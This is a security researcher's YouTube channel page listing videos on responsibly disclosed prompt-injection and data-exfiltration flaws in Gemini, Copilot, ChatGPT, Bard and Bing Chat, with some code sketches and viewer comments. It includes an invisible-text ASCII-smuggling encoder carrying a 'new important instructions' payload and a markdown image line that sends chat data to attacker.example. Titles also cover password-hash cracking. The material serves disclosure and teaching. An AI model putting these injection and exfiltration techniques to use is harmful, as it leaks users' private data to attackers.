Embrace The Red
  • 41 videos
  • 697,714 views

Videos

Google Colab with Gemini AI - Prompt Injection Pirate Demo (POC)
218 views · 28 days ago
In this proof-of-concept we show how an indirect prompt injection from a notebook can turn Google Colab AI (Gemini) into a pirate and stage data for exfiltration. See blog post for details: embracethered.com/blog/posts/2024/google-colab-image-render-exfil/
GitHub Copilot Chat - From Prompt Injection to Data Exfiltration
746 views · 2 months ago
Details: embracethered.com/blog/posts/2024/github-copilot-chat-prompt-injection-data-exfiltration/ This security vulnerability was reported to Microsoft/GitHub in February 2024 and confirmed fixed in June 2024. See blog post for details.
LLM Vulnerability Scanning with garak. Tutorial: Test your own chat bots!
1.1K views · 2 months ago
In this video we cover basic usage of garak, an LLM vulnerability scanner. In particular, we explore how to test your own REST-based LLM applications. This can be done by using the built-in REST generator and configuring it to work with the target application. (The volume of the video after uploading to YouTube is not very loud, so please adjust accordingly.) Garak on Github: github.com/leondz/garak/ The...
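For orientation, below is a rough sketch of such a REST generator options file, written as a small Python script that emits the JSON. The field names follow the garak documentation for the REST generator but may differ between garak versions, and the endpoint, header and JSON field names are placeholders for your own application - treat this as a starting point, not a definitive config.

    # make_rest_config.py - sketch of a garak REST generator options file (illustrative only)
    import json

    options = {
        "rest": {
            "RestGenerator": {
                "name": "my chat app",                                  # any label
                "uri": "https://chat.example.internal/api/generate",    # placeholder endpoint
                "method": "post",
                "headers": {"Authorization": "Bearer $KEY"},            # placeholder auth header
                "req_template_json_object": {"prompt": "$INPUT"},       # $INPUT is replaced with each probe prompt
                "response_json": True,
                "response_json_field": "reply"                          # field where your app returns its text
            }
        }
    }

    with open("rest_config.json", "w") as f:
        json.dump(options, f, indent=2)

    # Assumed invocation (flag and probe names may vary by garak version):
    #   garak --model_type rest -G rest_config.json --probes promptinject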
ChatGPT: Hacking Memories via Images (Prompt Injection to Persistent Memories)
426 views · 2 months ago
Details: embracethered.com/blog/posts/2024/chatgpt-hacking-memories/ This issue was disclosed to OpenAI in May 2024, but was seen as a "model safety issue" and not a security vulnerability. *DISCLAIMER*: Penetration testing and red teaming require authorization from proper stakeholders. Do not perform unauthorized or illegal activities. This content is for educational purposes to help secure s...
Backdooring Keras Models and How to Detect It (Machine Learning Attack Series)
468 views · 3 months ago
In machine learning, model deserialization issues can lead to arbitrary code execution. This video explains the attack and how you can scan model files to protect your organization. It covers backdooring the original Keras *Husky AI* model from the *Machine Learning Attack Series*, and afterwards we investigate tooling to detect the backdoor. *DISCLAIMER*: Penetration testing an...
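As a rough illustration of the detection side: in Keras, Lambda layers are a well-known way to smuggle serialized code into a saved model, so one simple check is to parse a full-model .h5 file and flag any Lambda layers. This is only a sketch and not the tooling shown in the video; dedicated model scanners cover many more cases.

    # scan_keras_h5.py - sketch: flag Lambda layers in a Keras .h5 model (illustrative only)
    import json
    import sys
    import h5py

    def scan(path):
        with h5py.File(path, "r") as f:
            raw = f.attrs.get("model_config")   # Keras stores the architecture as a JSON string
        if raw is None:
            print("no model_config attribute - not a full-model .h5 file?")
            return
        config = json.loads(raw.decode() if isinstance(raw, bytes) else raw)

        hits = []
        def walk(layer):
            if layer.get("class_name") == "Lambda":
                hits.append(layer.get("config", {}).get("name", "<unnamed>"))
            for inner in layer.get("config", {}).get("layers", []):   # nested sub-models
                walk(inner)

        for layer in config.get("config", {}).get("layers", []):
            walk(layer)
        print("suspicious Lambda layers:", hits if hits else "none found")

    if __name__ == "__main__":
        scan(sys.argv[1])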
Bobby Tables but with LLMs: Google NotebookLM - Data Exfiltration POC
340 views · 3 months ago
This demo shows how a prompt injection attack hidden within a user's profile can lead to data exfiltration when processing untrusted data with NotebookLM. Detailed blog: embracethered.com/blog/posts/2024/google-notebook-ml-data-exfiltration/ Responsible Disclosure *Update:* After public disclosure the Google NotebookLM team reached out to me and fixed the vulnerability within a few days! This vulne...
ASCII Smuggling: Crafting Invisible Text and Decoding Hidden Secrets -New Threat for LLMs and beyond
1.1K views · 6 months ago
This video provides a deep dive into ASCII Smuggling. It's possible to hide invisible text in plain sight using Unicode Tags block code points. Some Large Language Models (LLMs) interpret such hidden text as instructions, and some are also able to craft such hidden text! Additionally, this has implications beyond Machine Learning, AI and LLM applications, as it allows rendering of invisible text i...
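To make the mechanics concrete, here is a minimal Python sketch of the idea (not the exact tool from the video): printable ASCII characters are shifted into the Unicode Tags block (U+E0000-U+E007F), which most user interfaces render as nothing at all, yet the code points survive copy/paste into an LLM prompt.

    # ascii_smuggle.py - minimal sketch of hiding/revealing text via Unicode Tags block code points
    TAG_BASE = 0xE0000  # Tags block: U+E0000..U+E007F mirrors ASCII 0x00..0x7F

    def hide(visible, hidden):
        """Append an invisible copy of `hidden` to `visible`."""
        tags = "".join(chr(TAG_BASE + ord(c)) for c in hidden if 0x20 <= ord(c) <= 0x7E)
        return visible + tags

    def reveal(text):
        """Recover characters smuggled in the Tags block."""
        return "".join(chr(ord(c) - TAG_BASE) for c in text if TAG_BASE <= ord(c) <= TAG_BASE + 0x7F)

    if __name__ == "__main__":
        payload = hide("Have a nice day!", "new important instructions: ...")
        print(payload)          # looks like plain "Have a nice day!" in most UIs
        print(reveal(payload))  # -> "new important instructions: ..."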
Real-world exploits and mitigations in LLM applications (37c3)
22K views · 7 months ago
Video recording of my talk at the 37th Chaos Communication Congress in Hamburg titled "NEW IMPORTANT INSTRUCTIONS: Real-world exploits and mitigations in Large Language Model applications" about LLM app security and Prompt Injections specifically. A big thank you to the CCC organizers and all the volunteers for putting together such a great event! Source Video: media.ccc.de/v/37c3-12292-new_imp...
Hacking Google Bard: Prompt Injection to Data Exfiltration via Image Markdown Rendering (Demo Video)
6K views · 9 months ago
Demo video of an end-to-end data exfiltration exploit via a malicious Google Doc. The exploit leverages an indirect prompt injection which injects an image markdown element that serves as the exfiltration channel. This vulnerability was responsibly disclosed to Google VRP on September 19th, 2023, and Google reported it as fixed on October 19th, 2023. Details in this blog post: embracethered.com/blog/posts/2...
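The injected markdown itself is tiny; conceptually it looks something like the line below (the attacker domain and parameter name are illustrative). When the chat client renders the image, the browser requests the URL, and the query string, filled in by the model with conversation data, lands in the attacker's web server log.

    ![logo](https://attacker.example/log?q=<data the model was told to summarize and append>)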
Data Exfiltration Vulnerabilities in LLM Applications and Chatbots: Bing Chat, ChatGPT and Claude
1.4K views · 11 months ago
During an Indirect Prompt Injection attack, an adversary can inject malicious instructions to have a large language model (LLM) application (such as a chatbot) send data off to other servers on the Internet. In this video we discuss three techniques for data exfiltration, including proof-of-concepts I responsibly disclosed to OpenAI, Microsoft and Anthropic, a plugin vendor, and how the vendors...
Bing Chat - Data Exfiltration Exploit (responsibly disclosed to Microsoft and now fixed)
1.4K views · 1 year ago
This is the demo video I sent to Microsoft's Security Response Center when reporting the issue on April 8th, 2023. MSRC informed me on June 15th, 2023 that the vulnerability was fixed and hence can be disclosed publicly. Detailed Blog Post: embracethered.com/blog/posts/2023/bing-chat-data-exfiltration-poc-and-fix/
POC - ChatGPT Plugins: Indirect prompt injection leading to data exfiltration via images
4.4K views · 1 year ago
As predicted by security researchers, with the advent of plugins, Indirect Prompt Injections are now a reality within ChatGPT’s ecosystem. Overview: User enters data 0:05 User asks ChatGPT to query the web 0:25 ChatGPT invokes the WebPilot Plugin 0:35 The Indirect Prompt Injection from the website succeeds 0:58 ChatGPT sent data to remote server 1:18 Accompanying blog post: embracethered.com/blo...
Adversarial Prompting - Tutorial + Lab
1.5K views · 1 year ago
Practical examples and try-it-yourself labs to help learn about and research Prompt Injections. Colab Notebook: colab.research.google.com/drive/1qGznuvmUj7dSQwS9A9L-M91jXwws-p7k The examples range from simple scenarios, such as changing the output message to a specific text, to more complex scenarios such as JSON object injection as well as HTML/XSS and also Data Exfiltration. Intro & Setup 0:0...
Prompt Injections - An Introduction
5K views · 1 year ago
Many courses teach prompt engineering, and currently pretty much all examples are vulnerable to Prompt Injections. Indirect Prompt Injections especially are dangerous. They allow untrusted data to take control of the LLM (large language model) and give an AI new instructions, a mission and an objective. This video aims to raise awareness of this rising problem. Injections Lab: colab.research.google...
Decrypting SSL/TLS browser traffic with Wireshark (using netsh trace start)
12K views · 1 year ago
Decrypting SSL/TLS browser traffic with Wireshark (using netsh trace start)
Simplify your life with ChatGPT API Shell Integration: Yolo your Bash + PowerShell Assistant (GPT-4)
9K views · 1 year ago
Simplify your life with ChatGPT API Shell Integration: Yolo your Bash PowerShell Assistant (GPT-4)
Grabbing and cracking macOS password hashes (with dscl and hashcat)
8K views · 1 year ago
Grabbing and cracking macOS password hashes (with dscl and hashcat)
SSH Agent Hijacking - Hacking technique for Linux and macOS explained
3.1K views · 1 year ago
SSH Agent Hijacking - Hacking technique for Linux and macOS explained
How to extract NTLM Hashes from Wireshark Captures for cracking with Hashcat
9K views · 1 year ago
How to extract NTLM Hashes from Wireshark Captures for cracking with Hashcat
SQL Injection Attacks For Beginners (Basics)
1.2K views · 1 year ago
SQL Injection Attacks For Beginners (Basics)
Server-Side Request Forgery (SSRF) hacking variations you MUST KNOW about!
565 views · 1 year ago
Server-Side Request Forgery (SSRF) hacking variations you MUST KNOW about!
Dumping cleartext Wi-Fi passwords using netsh in Windows (netsh wlan show profiles)
1.8K views · 1 year ago
Dumping cleartext Wi-Fi passwords using netsh in Windows (netsh wlan show profiles)
Two ChatGPT bots using unofficial API to play Tic-Tac-Toe autonomously against each other
816 views · 1 year ago
Two ChatGPT bots using unofficial API to play Tic-Tac-Toe autonomously against each other
SameSite Cookies for Everyone - Cross Site Request Forgery Mitigations (follow up)
3.7K views · 1 year ago
SameSite Cookies for Everyone - Cross Site Request Forgery Mitigations (follow up)
ChatGPT - Imagine you are a Microsoft SQL Server database server
562K views · 1 year ago
ChatGPT - Imagine you are a Microsoft SQL Server database server
ChatGPT - Commodore 64
1.1K views · 1 year ago
ChatGPT - Commodore 64
Understanding the basics of Cross-Site Request Forgery attacks
422 views · 1 year ago
Understanding the basics of Cross-Site Request Forgery attacks
Pass the Cookies and Pivot to the Clouds
286 views · 2 years ago
Pass the Cookies and Pivot to the Clouds
Hacking Machine Learning Systems (Red Team Edition) - AI Hacker
4K views · 2 years ago
Hacking Machine Learning Systems (Red Team Edition) - AI Hacker

Comments

  • @SaltyBalsZ
    @SaltyBalsZ 8 hours ago

    Should've put the voice volume higher and the music lower. Almost shit my pants when the outro started.

  • @davidvidic
    @davidvidic 21 hours ago

    sound?

    • @embracethered
      @embracethered 7 hours ago

      Thanks for the comment. It's a video complementing the recent blog post. But you have a good point, maybe I should start speaking over these exploit demos, so they also work as stand-alone videos.

  • @itamarcohen331
    @itamarcohen331 2 days ago

    What is that key file? How do I create it and use it? I created it from scratch, but after running the commands it has zero length.

    • @embracethered
      @embracethered 2 days ago

      It will be created automatically if the environment variable has been set; note that not all browsers might support it. Also see embracethered.com/blog/posts/2023/decrypt-wireshark-traffic-https-netsh/

  • @user-td4pf6rr2t
    @user-td4pf6rr2t 10 days ago

    Do something fun like reflective shell function declaration.

  • @mo.inshasi9049
    @mo.inshasi9049 12 days ago

    Perfect, thank you!

  • @donatocapitella
    @donatocapitella 28 days ago

    As usual, Johann is our mighty god of prompt injection 🙏🙏🙏 Does this work everywhere with the Gemini side panel? I noticed that Gemini has become quite aggressive with validating links, but I guess Google domains are whitelisted?

    • @embracethered
      @embracethered 28 days ago

      Thanks for checking it out! 🙂 The side panel in Workspaces, Drive etc. seems different from other offerings (like Colab). The only thing in common might be the name (and use of the same backend model); the actual LLM app integration is different. I don't show it in the video or blog post, but currently there is also no toxicity output filtering (so with some prompting tricks you can make Colab's Gemini swear at the user if they open a notebook from an untrusted source) - I shared this with Google and hopefully they'll improve content moderation soon.

  • @user-zm6ld2qq8p
    @user-zm6ld2qq8p 28 days ago

    First I read the blog on GitBook, then came here to watch the POC.

    • @embracethered
      @embracethered 28 days ago

      Thanks for reading and watching! Hope it's helpful to understand some of the novel appsec risks we face with AI applications!

    • @user-zm6ld2qq8p
      @user-zm6ld2qq8p 28 days ago

      @@embracethered Yes, I'd like to connect with you for some guidance. Where can I connect with you?

  • @cyberprotec
    @cyberprotec 29 days ago

    Thanks for this content. Will you be able to assist with setting up a GPU environment for a garak scan? I've been working on this for a while. EC2 with an ML AMI?

    • @embracethered
      @embracethered 28 days ago

      Hey thanks for watching! What is the issue you are running into with these AMIs? A good suggestion might also be to join the garak Discord to see if anyone has experience with EC2 and ML AMIs - lots of helpful folks there.

    • @cyberprotec
      @cyberprotec 28 days ago

      @@embracethered Thanks for the feedback. I am on the Discord. I have dropped this there, but it seems like no one is doing that. I am trying to build a prod integration with our Jira in such a way that when devs request a model via Jira, a workflow kicks in: the API gateway collects the model name and uses a Lambda to trigger Garak on the instance, scan the model, then export a zip of the report to Jira and Slack. I have part of the integration; I'm just running into issues setting up Garak to use the GPUs on the instance. I have checked the GPUs [lsmod | grep nvidia] [nvidia-smi] and they are running, but Garak is not using them. It would rather use CPU and memory. There are 4 GPUs with a total of 98 GB of memory. Garak attempts to use one, and once the memory on that single GPU maxes out [~23 GB], the Garak process crashes.

  • @imvadimzz6483
    @imvadimzz6483 1 month ago

    I've downloaded SecLists in the terminal, but I don't know which command to type to use a wordlist.

  • @Sumukh30
    @Sumukh30 1 month ago

    I have 4 REST APIs; the 1st API request has the injection point and the 4th API has the response for the tool to analyse. In this case, how do I write the config.json file? Does the tool support multiple requests?

    • @embracethered
      @embracethered 1 month ago

      Garak supports creating custom generators for dialogue-based systems - I think for what you describe that's probably best. Search for garak.generators.base in the documentation. Hope that helps.
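      For anyone exploring that route, a very rough sketch of a custom generator is below. It subclasses garak.generators.base.Generator and implements _call_model, as described in the garak docs; the exact signature and return type can vary between garak versions, and the URLs and JSON fields are placeholders for the multi-step flow described above.

      # dialogue_generator.py - sketch of a custom garak generator for a multi-request flow (illustrative only)
      import requests
      from garak.generators.base import Generator

      class DialogueGenerator(Generator):
          def _call_model(self, prompt, generations_this_call=1):
              session = requests.Session()
              # step 1: send the probe prompt into the first API (the injection point)
              r1 = session.post("https://app.example.internal/api/step1",   # placeholder URL
                                json={"input": prompt}, timeout=60)
              conversation_id = r1.json().get("id")
              # steps 2-3: any intermediate calls would go here
              # step 4: fetch the final response that garak's detectors should analyse
              r4 = session.get(f"https://app.example.internal/api/step4/{conversation_id}", timeout=60)
              return [r4.json().get("output", "")]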

  • @tristanmartin49
    @tristanmartin49 1 month ago

    Thank you for the well articulated and educational content :)

  • @samadborz
    @samadborz 1 month ago

    Thanks man, that helps me a lot! :) ;)

  • @joshuakawamata5406
    @joshuakawamata5406 1 month ago

    Thank you for this...

    • @embracethered
      @embracethered 1 month ago

      Glad it's useful! Thanks for checking it out!

  • @user-zm6ld2qq8p
    @user-zm6ld2qq8p 2 months ago

    Please make more videos on AI/ML security [the offensive part], but they need to cover the basics. I just love your videos, so I'm asking this as one honest student.

    • @embracethered
      @embracethered 2 months ago

      Thanks for the kind words! Really appreciate it. Will look into it. Have you watched: ruclips.net/video/JzTZQGYQiKw/видео.html yet? :)

    • @user-zm6ld2qq8p
      @user-zm6ld2qq8p 2 months ago

      @@embracethered I started to watch that playlist!

  • @berthold9582
    @berthold9582 2 months ago

    Very well explained, sir 🎉

  • @185_arnabroy2
    @185_arnabroy2 2 months ago

    Thank you very much for this video... Steve Jobs...

    • @embracethered
      @embracethered 2 months ago

      Sure thing! Thanks for watching!

  • @novaland.
    @novaland. 2 months ago

    Very useful video, thank you very much!

    • @embracethered
      @embracethered 2 months ago

      Glad it was helpful! And thanks for watching!

  • @nickbritt
    @nickbritt 2 months ago

    Great walkthrough. I’ve been following along for a while now; the ASCII smuggling tool is great. Is there a public place where we could try this tool out via a bug bounty program or similar? When I looked at the in-scope items, hallucinations and attacks like DAN were out of scope.

    • @embracethered
      @embracethered 2 months ago

      Thanks for watching! 🙏 Great question, it depends on the program. Bug bounty programs (and the industry at large) are a bit behind when it comes to considering novel LLM appsec issues and their end-to-end but also long-term implications. I often have lengthy threads with companies behind the scenes to help educate and explain, and it always starts with "not applicable", a "model safety" issue,... and eventually turns into a fix/improvements - including a few findings about ASCII smuggling I hope to share in the coming weeks/months. To explore and research I often create small toy apps myself to debug and help understand what could go wrong. Again, thanks for watching, and let me know if there is any specific topic you'd like me to cover in the future.

    • @nickbritt
      @nickbritt 2 months ago

      @@embracethered Honestly, I’ll be reading the blog and watching regardless. I really enjoy the data exfiltration techniques you shared. But I guess anything that would carry more impact for anyone implementing AI in their web applications, or areas that you deem have the most impact on the underlying models.

  • @LeonDerczynski
    @LeonDerczynski 2 months ago

    Beautiful. Thank you!

    • @embracethered
      @embracethered 2 months ago

      Thanks! Hope it's useful and helps some to get started! 🙂

  • @donatocapitella
    @donatocapitella 3 months ago

    Thank you for sharing this!

    • @embracethered
      @embracethered 3 months ago

      Thanks for watching! Check out the related blog post also. Also, let me know if there is any content you'd like to see covered in future. 🙂

  • @octopus3141
    @octopus3141 3 months ago

    Great stuff 👍

    • @embracethered
      @embracethered 3 months ago

      Thanks for the visit and note. Appreciate it! Let me know if there are any relevant topics you'd like to see covered?

  • @Agathozerk
    @Agathozerk 3 months ago

    nice video bru

    • @embracethered
      @embracethered 3 months ago

      Thanks! Let me know if there are other topics of interest?

  • @user-or7kk7gh8u
    @user-or7kk7gh8u 4 months ago

    Can you please share the .py file you ran in this video to monitor the ChatGPT 3.5 chat (print-data-exfiltration-log.py)? Please share the code.

    • @embracethered
      @embracethered 4 months ago

      It was just a script that filters the web server log for requests from the ChatGPT user agent and only shows the query parameter and no request IP - so it's easier to view. You can also just grep /var/log/nginx/access.log (assuming you use nginx on Linux). I can see if I still have the script somewhere, but it wasn't anything special.
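      For anyone who wants to recreate something similar, here is a small sketch in that spirit (not the original script): it assumes nginx's default "combined" log format, keeps only requests whose user agent mentions ChatGPT, and prints just the query string.

      # print-data-exfiltration-log style sketch (illustrative, not the original script)
      import re
      import sys

      # nginx "combined" format ends with: "METHOD /path?query HTTP/x.x" ... "user agent"
      LINE = re.compile(r'"[A-Z]+ (?P<path>\S+) HTTP/[^"]*".*"(?P<ua>[^"]*)"$')

      def main(path="/var/log/nginx/access.log"):
          with open(path, errors="replace") as f:
              for line in f:
                  m = LINE.search(line)
                  if not m or "chatgpt" not in m.group("ua").lower():
                      continue
                  _, _, query = m.group("path").partition("?")
                  if query:
                      print(query)   # only the exfiltrated query string, no client IP

      if __name__ == "__main__":
          main(*sys.argv[1:])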

  • @pez5491
    @pez5491 4 months ago

    Gold!

  • @maloseevanschaba7343
    @maloseevanschaba7343 4 months ago

    Perfect, straight to the point.

  • @Astranix59
    @Astranix59 5 months ago

    What wordlist file do you use?

    • @Astranix59
      @Astranix59 5 months ago

      @@embracethered thank you!!

  • @chitchatvn5208
    @chitchatvn5208 5 months ago

    Thanks. Great content!

  • @chitchatvn5208
    @chitchatvn5208 5 months ago

    Thanks Yohann.

  • @chitchatvn5208
    @chitchatvn5208 5 months ago

    Thanks Yohann.

    • @embracethered
      @embracethered 5 months ago

      Glad you found it interesting! Thanks for checking it out!

  • @chitchatvn5208
    @chitchatvn5208 5 months ago

    thanks Yohann.

    • @embracethered
      @embracethered 5 months ago

      Thank you! Hope it was useful! 🙂

  • @chitchatvn5208
    @chitchatvn5208 5 months ago

    Thanks Johann.

  • @6cylbmw
    @6cylbmw 5 months ago

    I didn't really understand the vulnerability impact. You are exfiltrating your own chat (user A) to your own drive (user A). How is it exploitable?

    • @embracethered
      @embracethered 5 months ago

      The attacker causes the chatbot to send past chat data to the attacker's server (in this case a Google Doc captures the exfiltrated data). Check out the linked blog post; it explains it in detail.

  • @endone3661
    @endone3661 5 months ago

    What is this?

    • @embracethered
      @embracethered 5 months ago

      It's about a Jupyter Notebook that lets you self-study prompt injection and experiment and play around with the technique by solving a set of challenges.

  • @th3pac1fist
    @th3pac1fist 5 months ago

    🔥

    • @embracethered
      @embracethered 5 months ago

      Thanks!! It's probably one of my most interesting videos.

  • @RandomAccess2
    @RandomAccess2 5 months ago

    [Environment]::SetEnvironmentVariable("SSLKEYLOGFILE", "c:\temp\sslkeys\keys", "MACHINE")
    netsh trace start capture=yes tracefile=c:\temp\sslkeys\trace.etl report=disabled
    netsh trace stop

  • @notV3NOM
    @notV3NOM 6 months ago

    Thanks, great insights

    • @embracethered
      @embracethered 6 months ago

      Thanks for watching! Glad it was interesting.

  • @erinclay4917
    @erinclay4917 6 months ago

    How'd you get that cool paint splash effect around your head? What software are you using?

    • @embracethered
      @embracethered 6 months ago

      Thanks! It's just a custom image I created: I drew a white circle on a black background, zigzagged that splash effect over it with a brush, and then used a filter on the webcam in OBS to blend it in.

  • @void-qy4ov
    @void-qy4ov 6 months ago

    Great tut. Thanks 👍

    • @embracethered
      @embracethered 6 months ago

      Glad it was helpful! Thanks for watching!

  • @Sway55
    @Sway55 6 months ago

    How do I do this for traffic outside of the browser? Say I have a desktop app.

  • @TheHologr4m
    @TheHologr4m 7 months ago

    Was not expecting this in the playlist.

  • @petraat8806
    @petraat8806 7 months ago

    I'm trying to understand what just happened. Can someone please explain?

    • @embracethered
      @embracethered 7 months ago

      You can read up on the details here: embracethered.com/blog/posts/2023/google-bard-data-exfiltration/ And if you want to understand the big picture around LLM prompt injections check out this talk m.ruclips.net/video/qyTSOSDEC5M/видео.html Thanks for watching!

  • @kajalpuri3404
    @kajalpuri3404 7 months ago

    Thank you so much. Exactly the video I needed.

  • @plaverty9
    @plaverty9 7 months ago

    I just tried this, but the only difference is I was capturing this information over HTTP instead of SMB. Does that make a difference? I ask because I was trying to generate a proof of concept where I controlled the username and password going in, but it wouldn't crack. I tried four different times and it didn't work. Is something different when these are captured over HTTP instead of an SMB connection?

    • @embracethered
      @embracethered 7 months ago

      Good question. My first thought is that it should just work the same, but I haven't tried. Relaying definitely works; that I have done many times in the past.

    • @plaverty9
      @plaverty9 7 months ago

      Thanks. I had a colleague try it too, and got the same result as I did. This is for a pentest proof of concept, so I’m not in position to relay unfortunately.

  • @netor-3y4
    @netor-3y4 7 months ago

    ff

  • @347my455
    @347my455 7 months ago

    superb!

  • @Fitnessdealnews
    @Fitnessdealnews 7 months ago

    One of the best presentations I’ve seen

    • @embracethered
      @embracethered 7 months ago

      Thanks for watching! Really appreciate the feedback! 😀

  • @MohdAli-nz4yi
    @MohdAli-nz4yi 7 months ago

    I think a better conclusion is: never put information you need to keep private into the context of an LLM, because it will leak.

    • @embracethered
      @embracethered 7 months ago

      Thanks for watching and the note. I think that misses the point that the LLM can attack the hosting app/user, so developers/users can't trust the responses. This includes confused deputy issues (in the app), such as automatic tool invocation.

    • @MohdAli-nz4yi
      @MohdAli-nz4yi 7 months ago

      @@embracethered Agreed! So 2 big points: 1. Never put info in the LLM context that you don't want to leak. 2. Never put untrusted input into the LLM context; it's like executing arbitrary code you downloaded from the internet on your machine. LLM inputs must always be trusted, because the LLM will "execute" them in "trusted mode".

    • @embracethered
      @embracethered 7 months ago

      @@MohdAli-nz4yi (1) I agree we shouldn't put sensitive information, like passwords, credit card numbers, or sensitive PII into chatbots. For (2) the challenge is that everyone wants to have an LLM operate over untrusted data. And that's the problem that hopefully one day will have a deterministic and secure solution. For now the best advice is to not trust the output. E.g. developers shouldn't blindly take the output and invoke other tools/plugins in agents or render output as HTML, and users shouldn't blindly trust the output because it can be a hallucination (or a backdoor), or attacker-controlled via an indirect prompt injection. However, some use cases might be too risky to implement at all. And it's best to threat-model implementations accordingly to understand risks and implications.

  • @ludovicjacomme1804
    @ludovicjacomme1804 7 months ago

    Excellent presentation, thanks a lot for sharing, extremely informative.

    • @embracethered
      @embracethered 7 months ago

      Thanks for watching! Glad to hear it's informative! 🙂

  • @artemsemenov8136
    @artemsemenov8136 7 months ago

    Thank you, this is awesome!

    • @embracethered
      @embracethered 7 months ago

      Glad you like it!

    • @artemsemenov8136
      @artemsemenov8136 7 months ago

      @@embracethered I'm a fan of yours, I've talked about your research at cybersecurity conferences in Russia. You're awesome.

    • @embracethered
      @embracethered 7 months ago

      Thank you! 🙏